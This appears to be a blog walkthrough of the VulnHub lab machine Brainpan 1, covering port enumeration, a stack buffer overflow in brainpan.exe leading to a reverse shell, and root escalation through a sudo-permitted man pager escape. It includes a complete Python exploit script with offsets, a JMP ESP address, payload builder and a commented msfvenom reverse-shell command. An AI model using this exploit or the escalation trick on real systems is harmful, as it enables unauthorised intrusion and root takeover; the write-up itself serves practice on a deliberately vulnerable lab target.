Sunday, September 2, 2018

Brainpan


BRAINPAN 1

- Layout for this exercise:




1 - INTRODUCTION

- The goal of this exercise is the study of the hacking process for the vulnerable machine Brainpan 1.

- Brainpan 1 can be downloaded from here:

https://www.vulnhub.com/entry/brainpan-1,51/

- Once downloaded and imported into VMware:





2 - ENUMERATION

- netdiscover reveals that Brainpan's IP address is 192.168.1.26:





- Nmap finds two open ports: 9999/tcp and 10000/tcp:





- Connecting with the browser to port 10000:





- dirb scans the web server and finds the folder /bin:





- Connecting to /bin with the browser there is an executable called brainpan.exe:




- Downloading brainpan.exe to Kali:





- Note that it is a Windows executable (PE) file:





- Running strings on brainpan.exe shows references to functions such as strcpy that are prone to buffer overflows:





- Connecting with the browser to the other open port 9999:




- Let's connect to port 9999 again, this time with netcat. Entering a random password, access is denied:






3 - EXPLOITATION

3.1 - ANALYZING BRAINPAN.EXE AT WINDOWS 10 WITH IMMUNITY DEBUGGER

- To analyze brainpan.exe in depth, let's move the file to a Windows environment, in this case a Windows 10 machine:










3.1.1 - Finding the password

- Opening and running brainpan.exe in Immunity Debugger, it is clear that the string shitstorm is compared with the user input using the function strcmp:








- This leads us to guess that shitstorm is the password for the application:




- Our guess was correct because now the access is granted.


3.1.2 - Buffer overflow 

- As discovered during the enumeration step, brainpan.exe references functions like strcpy that are prone to buffer overflow exploitation.

- First of all, let's create a Python script that sends a long string of "A"s to brainpan.exe:






- Giving execution permissions to exploit_windows.py:




- Opening and running brainpan.exe with Immunity Debugger:




- Launching the exploit against the Windows 10 machine:





- The EIP and the stack are overwritten with "A"s:








- Creating a cyclic pattern of length 1000 and inserting it into the exploit:








- Restarting brainpan.exe with Immunity Debugger and launching the exploit:




-  The EIP is overwritten with 35724134:










- The offset for 35724134 is 524 (EIP is read little-endian, so 0x35724134 corresponds to the substring "4Ar5" of the pattern):





- Now, let's modify the script as follows, placing 524 "A"s, then "BBBB" where EIP should land, then "C"s:






- Restarting brainpan.exe with Immunity Debugger and launching the last version of the exploit:




- The result is that EIP is overwritten with BBBB (0x42424242), as expected, which confirms the offset:









- Looking for a JMP ESP instruction, we find one at address 311712F3:






- The address 311712F3 should replace the string BBBB at the position where EIP is overwritten, entered in little-endian format: \xF3\x12\x17\x31

- Creating shellcode for a reverse shell from the Windows 10 machine back to Kali on port 4444:





- Also, a NOP sled is placed right after the return address (that is, where ESP points once JMP ESP executes) and before the shellcode, so that execution slides safely into the payload.

- Joining everything at the script exploit_windows.py:






- Setting a listening session with Netcat:




- Launching the exploit one last time:




- The exploit is successful and we get a remote shell from Windows 10 on Kali:




- Output from Immunity Debugger:





3.2 - EXPLOITING BRAINPAN 

- Now, let's replace the Windows shellcode with one for Linux, since the real target, Brainpan, runs the binary under Wine on Linux:




- Inserting the Linux shellcode into a new exploit script (only the shellcode changes; offset and return address stay the same):






- Giving execution permissions:




- Setting a listening session with netcat on port 5555:




- Launching the exploit against Brainpan:





- The exploit succeeds and we obtain a low-privilege shell:




- Improving the shellcode:



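- As an added example (this is not the post's own exploit_windows.py, which appears above only as screenshots), the script below gathers the three stages of section 3.1.2 (crash with "A"s, locate EIP with a cyclic pattern, confirm the offset with "BBBB") and the final payload builder, and it serves section 3.2 as well, since the Linux variant differs only in the shellcode argument. Offset 524 and the JMP ESP address 0x311712F3 come from the walkthrough; the target address, the INT3 stand-in shellcode and the bad-character assumption (only \x00, because the input goes through strcpy) are mine:

```python
"""Added example, not the original exploit_windows.py: the stages of the
brainpan.exe stack overflow in one script. The target address and the
shellcode bytes are placeholders, see the comments."""
import socket
import string
import struct

# Values taken from the walkthrough above.
OFFSET = 524            # bytes written before EIP is overwritten
JMP_ESP = 0x311712F3    # address of a JMP ESP inside brainpan.exe
NOP = b"\x90"

# Constructed stand-in for the msfvenom output: four INT3 breakpoints stop
# Immunity Debugger exactly where the real shellcode would start running.
# A real payload would come from, for example:
#   msfvenom -p windows/shell_reverse_tcp LHOST=<kali ip> LPORT=4444 -b '\x00' -f python
SHELLCODE = b"\xcc" * 4


def pattern_create(length):
    """Cyclic pattern in the style of Metasploit's pattern_create.rb
    ('Aa0Aa1Aa2...'). Every 4-byte window is unique within the first
    20280 bytes, so the bytes landing in EIP identify their own offset."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(eip, length=1000):
    """Offset of the bytes found in EIP, or -1 if they are not in the pattern.
    Accepts the value as the debugger shows it (0x35724134 or '35724134').
    EIP is little-endian, so 0x35724134 is the substring b'4Ar5'."""
    if isinstance(eip, str):
        eip = int(eip, 16)
    needle = struct.pack("<I", eip)
    return pattern_create(length).find(needle)


def find_bad_chars(data, bad_chars=b"\x00"):
    """Byte values from bad_chars that occur in data. The password is copied
    with strcpy, so a NUL byte would truncate the buffer before the shellcode."""
    return sorted(set(b for b in data if b in bad_chars))


def build_payload(offset=OFFSET, ret_addr=JMP_ESP, shellcode=SHELLCODE, nop_sled=16):
    """Padding up to EIP, the JMP ESP address (little-endian), a NOP sled
    where ESP points after the jump, then the shellcode."""
    ret = struct.pack("<I", ret_addr)              # b"\xF3\x12\x17\x31" for JMP_ESP
    bad = find_bad_chars(ret + shellcode)
    if bad:
        raise ValueError("bad chars in payload: %r" % bad)
    return b"A" * offset + ret + NOP * nop_sled + shellcode


def stages():
    """The three 1000-byte buffers sent during the walkthrough, in order."""
    return {
        "crash": b"A" * 1000,                                             # does it crash?
        "pattern": pattern_create(1000),                                  # which bytes hit EIP?
        "control": b"A" * OFFSET + b"BBBB" + b"C" * (1000 - OFFSET - 4),  # EIP == 42424242?
    }


def send_payload(host, port, payload):
    """Deliver the buffer as the answer to the password prompt; the overflow
    happens in the strcpy of that input, so no valid password is needed."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.recv(1024)                 # banner and ">> " prompt
        s.sendall(payload + b"\n")


if __name__ == "__main__":
    # Target address is an assumption; the post uses 192.168.1.26 for Brainpan.
    send_payload("192.168.1.26", 9999, build_payload())
```

- Run the stages in order by passing stages()["crash"], stages()["pattern"] and stages()["control"] to send_payload while brainpan.exe is attached to the debugger, then feed the EIP value from the pattern run to pattern_offset; for Brainpan itself only the shellcode argument of build_payload changes.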

4 - PRIVILEGE ESCALATION

- So far we have a limited shell:




- Checking user puck's sudo permissions (sudo -l), we discover that he is allowed to run the command anansi_util as root without a password:





- Let's run it:




- There are 3 options; the most interesting seems to be manual [command], which takes a command name as its argument. Let's try it with pwd:








- The result is the man page for the command pwd.

- However, the command has been executed as root, and man's pager allows running additional shell commands inline by prefixing them with !, so let's try !/bin/sh:






- Great, we finally have a root shell:




- The ! shell escape is a feature of the pager that man uses (less by default); its purpose is to let the reader run commands without leaving the man page.

- In our case it has been of great help for a quick and easy privilege escalation, because man was executed with root privileges and the spawned shell inherits them.


5 - CAPTURING THE FLAG

- We find the flag by reading b.txt: